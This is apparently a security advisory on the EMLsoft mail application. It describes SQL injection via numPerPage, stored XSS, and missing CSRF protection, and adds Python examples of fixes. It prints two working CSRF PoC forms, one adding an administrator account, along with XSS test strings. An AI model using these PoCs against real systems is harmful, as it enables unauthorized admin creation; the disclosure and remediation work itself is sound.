
EMLsoft

1. Address page SQL Injection

\upload\eml\action\action.address.php

If the numPerPage parameter is present in the request, its value is concatenated directly into the SQL statement that is executed, so SQL injection is possible.

The injected SQL can be observed in the executed statement, and it can be used to read the current database name.

2. User page SQL Injection

\upload\eml\action\action.user.php

Here too, if the numPerPage parameter is present, its value is concatenated directly into the SQL statement that is executed, so SQL injection is possible.

The injected SQL can be observed in the executed statement, and it can be used to read the current database name.
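Both findings above share the same root cause: a pagination parameter pasted into the SQL text. The following added example (not EMLsoft's code; the table, the query and the request values are constructed) contrasts that pattern with a hardened handler that validates numPerPage as a bounded integer and passes it to the database as a bound parameter, so the value can never change the shape of the query.

```python
import re
import sqlite3


def make_db():
    """Constructed in-memory stand-in for the address book table (not the real schema)."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE address (id INTEGER PRIMARY KEY, name TEXT)")
    db.executemany("INSERT INTO address (name) VALUES (?)",
                   [("alice",), ("bob",), ("carol",)])
    return db


def list_addresses_unsafe(db, num_per_page):
    # Assumed shape of the weakness described above: the raw request
    # parameter becomes part of the SQL text, so whatever the client sends
    # is parsed as SQL, not as a number.
    sql = f"SELECT name FROM address LIMIT {num_per_page}"
    return sql, [row[0] for row in db.execute(sql)]


def parse_page_size(raw, default=20, maximum=100):
    """Accept numPerPage only as a positive integer of at most four digits, clamped to a ceiling."""
    if raw is None:
        return default
    if not re.fullmatch(r"[1-9][0-9]{0,3}", str(raw)):
        raise ValueError(f"invalid numPerPage: {raw!r}")
    return min(int(raw), maximum)


def list_addresses_safe(db, raw_num_per_page):
    n = parse_page_size(raw_num_per_page)
    # LIMIT takes a bound parameter; the validated integer never touches the SQL text.
    sql = "SELECT name FROM address LIMIT ?"
    return sql, [row[0] for row in db.execute(sql, (n,))]


if __name__ == "__main__":
    db = make_db()
    # A non-numeric value reshapes the unsafe query but is rejected by the safe one.
    print(list_addresses_unsafe(db, "1 OFFSET 2"))
    print(list_addresses_safe(db, "2"))
```

Validation before binding matters even with prepared statements: a LIMIT clause cannot be parameterized in every database driver, so the integer cast plus the upper bound is what keeps the handler safe when the value ends up in the query text anyway.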

3. User page XSS

An XSS vulnerability exists in every input box on this page: values submitted through the form are written back into the HTML without encoding.
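The fix for a form that reflects every field is context-aware output encoding. This added example (not EMLsoft's code; the field names and the sample values are constructed) renders a user-supplied value into an HTML text node and into an attribute value with the correct escaping for each context, and includes a check a reviewer can run over rendered output to spot values that reached the page unencoded.

```python
import html

# Constructed sample of what a user could save in a form field; the script
# tag and the attribute-breakout string are the classic test markers.
SAMPLE_FIELDS = {
    "name": "<script>alert(1)</script>",
    "email": 'x" onmouseover="alert(2)',
}


def render_unsafe(label, value):
    # Assumed shape of the weakness: stored value dropped straight into the markup.
    return f'<label>{label}</label><input type="text" name="{label}" value="{value}">'


def render_field(label, value):
    # Text-node context needs &, <, > encoded; attribute context also needs
    # the quote characters encoded so the value cannot close the attribute.
    return (f"<label>{html.escape(label)}</label>"
            f'<input type="text" name="{html.escape(label, quote=True)}" '
            f'value="{html.escape(value, quote=True)}">')


def value_reached_page_raw(rendered, value):
    """True if a value containing markup-significant characters appears unencoded in the output."""
    needs_encoding = html.escape(value, quote=True) != value
    return needs_encoding and value in rendered


def audit(renderer, fields=SAMPLE_FIELDS):
    """Return the labels whose sample value the renderer emitted without encoding."""
    return [label for label, value in fields.items()
            if value_reached_page_raw(renderer(label, value), value)]


if __name__ == "__main__":
    print("unsafe renderer leaks:", audit(render_unsafe))
    print("hardened renderer leaks:", audit(render_field))
```

Encoding at output time is the control that holds regardless of what was accepted on input; a Content-Security-Policy header without unsafe-inline is a worthwhile second layer but does not replace it.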

4. Address page CSRF

The add-address request carries no anti-CSRF token. After logging in, opening the following PoC adds an address book entry.

<html>
  <body>
  <script>history.pushState('', '', '/')</script>
    <form action="http://10.10.10.39:8080/lalalalala/CMS/eml/upload/eml/?action=address&do=add" method="POST">
      <input type="hidden" name="name" value="123" />
      <input type="hidden" name="sex" value="%E7%94%B7" />
      <input type="hidden" name="phone" value="123" />
      <input type="hidden" name="tel" value="123" />
      <input type="hidden" name="email" value="123" />
      <input type="hidden" name="deparyment" value="123" />
      <input type="hidden" name="position" value="1" />
      <input type="hidden" name="address" value="1" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>

5. User page CSRF

The add-user request likewise carries no anti-CSRF token. After logging in, opening the following PoC adds an administrator account.

<html>
  <!-- CSRF PoC - generated by Burp Suite Professional -->
  <body>
  <script>history.pushState('', '', '/')</script>
    <form action="http://10.10.10.39:8080/lalalalala/CMS/eml/upload/eml/?action=user&do=add" method="POST">
      <input type="hidden" name="username" value="111" />
      <input type="hidden" name="roleid" value="1" />
      <input type="hidden" name="password" value="111" />
      <input type="hidden" name="name" value="" />
      <input type="hidden" name="sex" value="%E7%94%B7" />
      <input type="hidden" name="phone" value="" />
      <input type="hidden" name="tel" value="" />
      <input type="hidden" name="email" value="" />
      <input type="hidden" name="qq" value="" />
      <input type="hidden" name="deparyment" value="" />
      <input type="hidden" name="position" value="" />
      <input type="hidden" name="address" value="" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>
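Both PoCs above work because the server accepts any POST that arrives with the victim's session cookie. The following added example (not EMLsoft's code; the session object, form dictionaries and request headers are constructed) shows the server-side gate that defeats them: a per-session synchronizer token that the attacker's page cannot read, checked with a constant-time comparison, plus an Origin/Referer check as a second layer. The site origin is taken from the PoC URLs; the handler name is hypothetical.

```python
import hmac
import secrets
from urllib.parse import urlparse

# Origin of the target in the PoCs above; the path is irrelevant to the check.
SITE_ORIGIN = "http://10.10.10.39:8080"


def issue_csrf_token(session):
    """Bind a fresh unguessable token to the session and return it for embedding in the form."""
    token = secrets.token_urlsafe(32)
    session["csrf_token"] = token
    return token


def check_csrf(session, form, headers):
    # Layer 1: a form auto-submitted from another site arrives with that
    # site's Origin (or Referer), not ours.
    origin = headers.get("Origin") or headers.get("Referer")
    if origin is None:
        return False, "missing Origin/Referer"
    p = urlparse(origin)
    if f"{p.scheme}://{p.netloc}" != SITE_ORIGIN:
        return False, "cross-site origin"
    # Layer 2: the submitted token must equal the one bound to this session;
    # compare_digest avoids leaking the token through timing.
    expected = session.get("csrf_token")
    supplied = form.get("csrf_token", "")
    if not expected or not hmac.compare_digest(expected, supplied):
        return False, "bad csrf token"
    return True, "ok"


def handle_user_add(session, form, headers):
    """Hypothetical handler for ?action=user&do=add with the CSRF gate in front of it."""
    ok, reason = check_csrf(session, form, headers)
    if not ok:
        return 403, reason
    # The real add logic would follow; only the gate matters here.
    return 200, f"added user {form['username']}"


if __name__ == "__main__":
    session = {}
    # Constructed request shaped like the PoC: attacker origin, no token.
    forged = {"username": "111", "roleid": "1", "password": "111"}
    print(handle_user_add(session, forged, {"Origin": "http://attacker.example"}))
    # Constructed legitimate request: same-site origin and the session's token.
    token = issue_csrf_token(session)
    print(handle_user_add(session, dict(forged, csrf_token=token), {"Origin": SITE_ORIGIN}))
```

Marking the session cookie SameSite=Lax or Strict adds a third, browser-enforced layer, but the token check is the one the application itself controls and should be applied to every state-changing POST, including the address book add.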